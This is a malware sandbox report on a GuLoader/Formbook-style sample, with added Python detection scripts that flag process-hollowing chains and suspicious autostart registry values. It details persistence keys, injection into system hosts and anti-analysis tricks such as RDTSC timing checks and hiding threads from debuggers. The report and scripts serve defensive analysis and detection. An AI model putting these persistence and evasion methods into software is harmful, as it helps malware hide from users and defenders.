Source: unknown | Process created: C:\Users\user\Desktop\___ __ ___.exe 'C:\Users\user\Desktop\___ __ ___.exe'
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe 'C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe'
Source: unknown | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\subfolder1\filename1.vbs'
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe 'C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe'
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe
Source: unknown | Process created: C:\Windows\System32\msiexec.exe C:\Windows\System32\msiexec.exe
Source: unknown | Process created: C:\Windows\System32\audiodg.exe C:\Windows\System32\audiodg.exe
Source: unknown | Process created: C:\Windows\System32\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe'
Source: unknown | Process created: C:\Program Files\Rutf\IconCache-ze.exe C:\Program Files\Rutf\IconCache-ze.exe
Source: unknown | Process created: C:\Program Files\Rutf\IconCache-ze.exe C:\Program Files\Rutf\IconCache-ze.exe
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe 'C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe'
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe 'C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe'
Source: unknown | Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
Source: unknown | Process created: C:\Windows\System32\msdt.exe C:\Windows\System32\msdt.exe
Source: C:\Users\user\Desktop\___ __ ___.exe | Process created: C:\Users\user\Desktop\___ __ ___.exe 'C:\Users\user\Desktop\___ __ ___.exe'
Source: C:\Users\user\Desktop\___ __ ___.exe | Process created: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe 'C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe'
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Process created: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe 'C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe'
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Process created: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe
Source: C:\Windows\explorer.exe | Process created: C:\Program Files\Rutf\IconCache-ze.exe C:\Program Files\Rutf\IconCache-ze.exe
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\System32\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe'
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
Source: C:\Program Files\Rutf\IconCache-ze.exe | Process created: C:\Program Files\Rutf\IconCache-ze.exe C:\Program Files\Rutf\IconCache-ze.exe
Source: C:\Program Files\Rutf\IconCache-ze.exe | Process created: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe 'C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe'
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Process created: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe 'C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe'
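Read with the Source column as the parent, the "Process created" rows above already describe the execution chain: the sample relaunches itself with an identical command line (the classic hollowing setup, repeated by filename1.exe and IconCache-ze.exe), wscript.exe runs the dropped filename1.vbs from Temp and that script starts filename1.exe again, msiexec.exe, audiodg.exe and msdt.exe appear with bare command lines and no visible parent (the hosts Formbook injects into), and msiexec.exe then spawns cmd.exe /c del on the dropped binary and a Firefox process. The script below is an added example, not part of the report: it parses rows in this format (with or without the column separator) and applies those observations as heuristics. The rows it embeds are transcribed from this page; the rule names, the list of system hosts and the Temp path check are this example's own choices.

```python
import re
from collections import Counter
from pathlib import PureWindowsPath

# "Process created" rows transcribed from the report (constructed input for this
# example). Source is the parent, or "unknown" when the sandbox did not see it.
REPORT_ROWS = r"""
Source: unknown | Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\subfolder1\filename1.vbs'
Source: unknown | Process created: C:\Windows\System32\msiexec.exe C:\Windows\System32\msiexec.exe
Source: unknown | Process created: C:\Windows\System32\audiodg.exe C:\Windows\System32\audiodg.exe
Source: unknown | Process created: C:\Windows\System32\msdt.exe C:\Windows\System32\msdt.exe
Source: C:\Users\user\Desktop\___ __ ___.exe | Process created: C:\Users\user\Desktop\___ __ ___.exe 'C:\Users\user\Desktop\___ __ ___.exe'
Source: C:\Users\user\Desktop\___ __ ___.exe | Process created: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe 'C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe'
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Process created: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe 'C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe'
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe
Source: C:\Windows\explorer.exe | Process created: C:\Program Files\Rutf\IconCache-ze.exe C:\Program Files\Rutf\IconCache-ze.exe
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\System32\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe'
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
Source: C:\Program Files\Rutf\IconCache-ze.exe | Process created: C:\Program Files\Rutf\IconCache-ze.exe C:\Program Files\Rutf\IconCache-ze.exe
Source: C:\Program Files\Rutf\IconCache-ze.exe | Process created: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe 'C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe'
""".strip().splitlines()

# Parent runs up to "Process created:"; the child image ends at the first ".exe",
# the rest of the row is its command line. The "|" is optional so the page's raw
# form ("...exeProcess created: ...") parses too.
ROW = re.compile(
    r"Source:\s*(?P<parent>.+?)\s*\|?\s*Process created:\s*"
    r"(?P<image>.+?\.exe)\s*(?P<cmd>.*?)\s*$",
    re.IGNORECASE,
)

# System binaries Formbook-style injectors pick as hosts (this example's list).
SYSTEM_HOSTS = {"msiexec.exe", "audiodg.exe", "msdt.exe"}
TEMP_MARK = "\\appdata\\local\\temp\\"


def parse_rows(rows):
    parsed = []
    for row in rows:
        m = ROW.search(row)
        if m:
            parsed.append({k: m.group(k).strip() for k in ("parent", "image", "cmd")})
    return parsed


def _name(path):
    return PureWindowsPath(path).name.lower()


def flag_rows(rows):
    """Apply the heuristics; returns (rule, parent, child) triples."""
    findings = []
    for r in rows:
        parent, image, cmd = r["parent"], r["image"], r["cmd"]
        pname, cname, cmd_l = _name(parent), _name(image), cmd.lower()
        if parent.lower() == image.lower():
            findings.append(("self-spawn with identical image (hollowing candidate)", parent, image))
        if cname == "wscript.exe" and TEMP_MARK in cmd_l:
            findings.append(("script host runs a script from Temp", parent, image))
        if pname == "wscript.exe" and TEMP_MARK in image.lower():
            findings.append(("script host launched an executable from Temp", parent, image))
        if cname == "cmd.exe" and re.search(r"\bdel\b", cmd_l) and TEMP_MARK in cmd_l:
            findings.append(("deletes a dropped file from Temp", parent, image))
        if parent.lower() == "unknown" and cname in SYSTEM_HOSTS \
                and cmd_l.strip("'\"") == image.lower():
            findings.append(("system host started with a bare command line", parent, image))
        if pname == "msiexec.exe" and cname != "msiexec.exe":
            findings.append(("msiexec.exe spawned a non-installer child", parent, image))
    return findings


def summarize(findings):
    return Counter(rule for rule, _, _ in findings)


if __name__ == "__main__":
    for rule, parent, child in flag_rows(parse_rows(REPORT_ROWS)):
        print(f"[{rule}] {parent} -> {child}")
```

The bare-command-line rule is the one that transfers best to endpoint telemetry: msiexec.exe, audiodg.exe and msdt.exe normally start with arguments and a known parent (services.exe, svchost.exe, explorer.exe), so a Sysmon event ID 1 for one of them with an empty argument list and an unrelated parent is a strong injection signal on its own.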
Uses an in-process (OLE) Automation server
Source: C:\Users\user\Desktop\___ __ ___.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Writes ini files
Source: C:\Windows\System32\msiexec.exe | File written: C:\Users\user\AppData\Roaming\KP8PBRSW\KP8logri.ini
Found graphical window changes (likely an installer)
Source: Window Recorder | Window detected: More than 3 window changes detected
Checks if Microsoft Office is installed
Source: C:\Windows\System32\msiexec.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Creates a directory in C:\Program Files
Source: C:\Windows\explorer.exe | Directory created: C:\Program Files\Rutf
Source: C:\Windows\explorer.exe | Directory created: C:\Program Files\Rutf\IconCache-ze.exe
Binary contains paths to debug symbols
Source: Binary string: msiexec.pdb source: filename1.exe, 00000005.00000002.1133347887.00090000.00000040.00000001.sdmp
Source: Binary string: AudioDG.pdb source: filename1.exe, 00000007.00000002.1159119849.00060000.00000040.00000001.sdmp
Source: Binary string: ntdll.pdb source: filename1.exe, msdt.exe, 00000014.00000003.1440942034.016B0000.00000004.00000001.sdmp
Source: Binary string: c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\obj-firefox\browser\app\firefox.pdb source: msiexec.exe, 0000000A.00000003.1406418600.02730000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb3 source: filename1.exe, 00000005.00000002.1137702614.1EC42000.00000040.00000001.sdmp, filename1.exe, 00000007.00000002.1162617724.1EF20000.00000040.00000001.sdmp, msiexec.exe, 0000000A.00000003.1134742152.01580000.00000004.00000001.sdmp, audiodg.exe, 0000000B.00000003.1158929724.011D0000.00000004.00000001.sdmp, filename1.exe, 00000011.00000002.1451115256.1EE12000.00000040.00000001.sdmp, msdt.exe, 00000014.00000003.1440942034.016B0000.00000004.00000001.sdmp
Source: Binary string: msdt.pdb source: filename1.exe, 00000011.00000002.1450781655.1EB90000.00000040.00000001.sdmp

Data Obfuscation:

Yara detected GuLoader
Source: Yara match | File source: Process Memory Space: IconCache-ze.exe PID: 2584, type: MEMORY
Source: Yara match | File source: Process Memory Space: filename1.exe PID: 2212, type: MEMORY
Source: Yara match | File source: Process Memory Space: IconCache-ze.exe PID: 2744, type: MEMORY
Source: Yara match | File source: Process Memory Space: filename1.exe PID: 2132, type: MEMORY
Source: Yara match | File source: Process Memory Space: filename1.exe PID: 1508, type: MEMORY
Source: Yara match | File source: Process Memory Space: filename1.exe PID: 660, type: MEMORY
Source: Yara match | File source: Process Memory Space: ___ __ ___.exe PID: 304, type: MEMORY
Source: Yara match | File source: Process Memory Space: ___ __ ___.exe PID: 1548, type: MEMORY
Source: Yara match | File source: Process Memory Space: filename1.exe PID: 2860, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\___ __ ___.exe | Code function: 0_2_0040125A push ebp; ret 0_2_0040123C
Source: C:\Users\user\Desktop\___ __ ___.exe | Code function: 0_2_004088E5 push ebx; iretd 0_2_00408B8A
Source: C:\Users\user\Desktop\___ __ ___.exe | Code function: 0_2_0040889F push ebx; iretd 0_2_00408B8A
Source: C:\Users\user\Desktop\___ __ ___.exe | Code function: 0_2_0040118B push ebp; ret 0_2_0040123C
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 5_2_1EBB2869 push ecx; ret 5_2_1EBB287C
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 7_2_1EF53671 push ds; iretd 7_2_1EF5367C
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 7_2_1EF5363A push ds; retf 7_2_1EF53670
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 7_2_1EF53615 push ds; retf 7_2_1EF53670
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 7_2_1EF72869 push ecx; ret 7_2_1EF7287C
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 7_2_1EF342AF push ds; ret 7_2_1EF342B7
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 17_2_1ED63671 push ds; iretd 17_2_1ED6367C
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 17_2_1ED63615 push ds; retf 17_2_1ED63670
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 17_2_1ED6363B push ds; retf 17_2_1ED63670
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe | Code function: 17_2_1ED82869 push ecx; ret 17_2_1ED8287C

Boot Survival:

Creates an undocumented autostart registry key
Source: C:\Windows\System32\msiexec.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run KXF4ZPD06H
Creates autostart registry keys with suspicious values (likely registry only malware)
Source: C:\Users\user\Desktop\___ __ ___.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\filename1.vbs
Source: C:\Users\user\Desktop\___ __ ___.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\filename1.vbs
Creates an autostart registry key
Source: C:\Users\user\Desktop\___ __ ___.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key
Source: C:\Users\user\Desktop\___ __ ___.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key
Source: C:\Users\user\Desktop\___ __ ___.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key
Source: C:\Users\user\Desktop\___ __ ___.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key
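Two persistence points appear above. The first is an HKCU RunOnce value named "Startup key" that points at a .vbs in Temp, which is why the boot-survival chain passes through wscript.exe rather than through the dropped executable directly. The second is a value with the random-looking name KXF4ZPD06H under HKLM\...\Policies\Explorer\Run, written from the injected msiexec.exe; explorer.exe processes that key at logon, legitimate software almost never uses it, and it sits outside the Run/RunOnce keys most people check by hand. The script below is an added example, not part of the report: assess_value turns those observations into checks over (key, value name, data) triples, and collect_live_values reads the same keys from a live Windows registry with the standard winreg module so the checks can be run on a suspect host. The report does not show the data of the Policies\Explorer\Run value, so it is left empty here; the benign control entry and the "machine-generated name" heuristic are this example's own.

```python
import re

# Keys Windows evaluates at logon; the Policies\Explorer\Run pair is the one the
# report calls undocumented.
AUTOSTART_KEYS = [
    ("HKEY_CURRENT_USER", "Software\\Microsoft\\Windows\\CurrentVersion\\Run"),
    ("HKEY_CURRENT_USER", "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce"),
    ("HKEY_LOCAL_MACHINE", "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"),
    ("HKEY_LOCAL_MACHINE", "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce"),
    ("HKEY_CURRENT_USER", "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run"),
    ("HKEY_LOCAL_MACHINE", "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run"),
]

# (key, value name, data) transcribed from the report's Boot Survival rows. The
# report does not show the Policies\Explorer\Run data, so it is None here. The
# third entry is a constructed benign control that should raise nothing.
REPORT_VALUES = [
    ("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce",
     "Startup key", "C:\\Users\\user\\AppData\\Local\\Temp\\subfolder1\\filename1.vbs"),
    ("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run",
     "KXF4ZPD06H", None),
    ("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
     "ExampleUpdater", "C:\\Program Files\\Example\\updater.exe /background"),
]

SCRIPT_EXT = re.compile(r"\.(vbs|vbe|js|jse|wsf|wsh|hta|bat|cmd|ps1)\b", re.IGNORECASE)
STAGING_DIRS = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\",
                "\\users\\public\\", "\\programdata\\")
# Heuristic: eight or more upper-case letters/digits with at least one digit, like KXF4ZPD06H.
RANDOM_NAME = re.compile(r"^(?=.*\d)[A-Z0-9]{8,}$")


def assess_value(key, name, data):
    """Return the list of reasons one autostart value deserves a look (empty if none)."""
    findings = []
    key_l, data_l = key.lower(), (data or "").lower()
    if key_l.endswith("\\policies\\explorer\\run"):
        findings.append("Policies\\Explorer\\Run autostart, rarely used by legitimate software")
    if SCRIPT_EXT.search(data_l):
        findings.append("autostart target is a script")
    if any(d in data_l for d in STAGING_DIRS):
        findings.append("autostart target lives in a user-writable staging directory")
    if RANDOM_NAME.match(name):
        findings.append("value name looks machine-generated")
    return findings


def assess_all(values):
    """(key, value name) -> findings, for values that raised at least one."""
    result = {}
    for key, name, data in values:
        findings = assess_value(key, name, data)
        if findings:
            result[(key, name)] = findings
    return result


def collect_live_values():
    """Windows only: enumerate AUTOSTART_KEYS from the live registry via winreg."""
    import winreg
    hives = {"HKEY_CURRENT_USER": winreg.HKEY_CURRENT_USER,
             "HKEY_LOCAL_MACHINE": winreg.HKEY_LOCAL_MACHINE}
    values = []
    for hive, subkey in AUTOSTART_KEYS:
        try:
            with winreg.OpenKey(hives[hive], subkey) as k:
                index = 0
                while True:
                    try:
                        name, data, _type = winreg.EnumValue(k, index)
                    except OSError:      # no more values under this key
                        break
                    values.append((hive + "\\" + subkey, name, str(data)))
                    index += 1
        except OSError:                  # key absent (normal for Policies\Explorer\Run)
            continue
    return values


if __name__ == "__main__":
    for (key, name), findings in assess_all(REPORT_VALUES).items():
        print(f"{key} -> {name}")
        for f in findings:
            print("   ", f)
```

On a live host, `assess_all(collect_live_values())` gives the same output for whatever is actually registered; note that a 32-bit Python on 64-bit Windows sees the WOW6432Node view of HKLM\SOFTWARE unless the key is opened with the KEY_WOW64_64KEY access flag.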

Hooking and other Techniques for Hiding and Protection:

Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
Disables application error messages (SetErrorMode)
Source: C:\Users\user\Desktop\___ __ ___.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\___ __ ___.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\___ __ ___.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\___ __ ___.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\___ __ ___.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\___ __ ___.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\___ __ ___.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\___ __ ___.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\___ __ ___.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\___ __ ___.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\___ __ ___.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\___ __ ___.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\___ __ ___.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\___ __ ___.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\___ __ ___.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files\Rutf\IconCache-ze.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Rutf\IconCache-ze.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Rutf\IconCache-ze.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Rutf\IconCache-ze.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Rutf\IconCache-ze.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Rutf\IconCache-ze.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Rutf\IconCache-ze.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Rutf\IconCache-ze.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Rutf\IconCache-ze.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Rutf\IconCache-ze.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Rutf\IconCache-ze.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Rutf\IconCache-ze.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Rutf\IconCache-ze.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Rutf\IconCache-ze.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Rutf\IconCache-ze.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\System32\msiexec.exe RDTSC instruction interceptor: First address: 00077244 second address: 0007724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\System32\msiexec.exe RDTSC instruction interceptor: First address: 000774BE second address: 000774C4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\System32\audiodg.exe RDTSC instruction interceptor: First address: 00067244 second address: 0006724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\System32\audiodg.exe RDTSC instruction interceptor: First address: 000674BE second address: 000674C4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\System32\msdt.exe RDTSC instruction interceptor: First address: 000C7244 second address: 000C724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\System32\msdt.exe RDTSC instruction interceptor: First address: 000C74BE second address: 000C74C4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Code function: 5_2_1EC31EFF rdtsc 5_2_1EC31EFF
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\___ __ ___.exe API coverage: 8.6 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe TID: 1540 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe TID: 2432 Thread sleep time: -180000s >= -30000s
Source: C:\Windows\explorer.exe TID: 2616 Thread sleep time: -160000s >= -30000s
Source: C:\Windows\System32\msiexec.exe TID: 2500 Thread sleep time: -100000s >= -30000s
Source: C:\Windows\System32\msiexec.exe TID: 2536 Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe TID: 2844 Thread sleep count: 36 > 30
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe TID: 2844 Thread sleep time: -2160000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\System32\msiexec.exe Last function: Thread delayed
Source: C:\Windows\System32\msiexec.exe Last function: Thread delayed
Queries a list of all running processes
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to hide a thread from the debugger
Source: C:\Users\user\Desktop\___ __ ___.exe Code function: 0_2_003E050D NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000 0_2_003E050D
Hides threads from debuggers
Source: C:\Users\user\Desktop\___ __ ___.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\___ __ ___.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\subfolder1\filename1.exe Thread information set: HideFromDebugger
